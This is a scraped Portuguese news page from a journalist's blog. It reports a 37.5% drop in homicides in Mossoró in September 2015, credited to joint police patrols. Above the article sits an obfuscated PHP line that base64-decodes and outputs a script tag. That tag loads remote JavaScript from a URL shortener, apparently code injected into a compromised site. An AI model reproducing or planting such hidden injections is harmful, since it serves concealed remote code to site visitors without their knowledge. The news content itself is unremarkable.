$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Prefeitura de Mossoró divulga balanço e aponta que número de homicídios reduziu 37% em setembro

Prefeitura de Mossoró divulga balanço e aponta que  número de homicídios reduziu 37% em setembro
02 Out 2015

A Prefeitura de Mossoró divulgou hoje um balanço sobre o número de homicídios na cidade durante o mês de setembro. Segundo o balanço, o número de homicídios em Mossoró caiu 37,5% em comparação com o mesmo período do ano passado. Os dados comprovam a eficácia de ações conjuntas, executadas na cidade por diversas forças de segurança, como a Guarda Civil, Polícia Militar e de Trânsito.

Os dados apresentados pela Secretaria Municipal de Segurança Pública e Defesa Civil mostram que no mês passado Mossoró registrou 10 crimes violentos letais intencionais. Em setembro de 2014 foram 16. Esse resultado é reflexo de iniciativas como a “Operação Integração”, que conta com um efetivo de aproximadamente 100 homens, entre Guardas e PMs, e mais de 25 viaturas, realizando patrulhamento ostensivo, blitze, abordagens e outras ações, em mais de 20 bairros da cidade a cada edição.

“Desde que a Operação Integração foi implantada, o número de homicídios vem reduzindo significativamente. Esses avanços comprovam que a metodologia de trabalho que adotamos está sendo eficaz. Juntos, Guarda Civil e Polícia Militar estão mudando a realidade da segurança pública em Mossoró, e a população já reconhece e constata os efeitos positivos dessa união”, destaca o prefeito Francisco José Júnior.

unnamed(1)

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *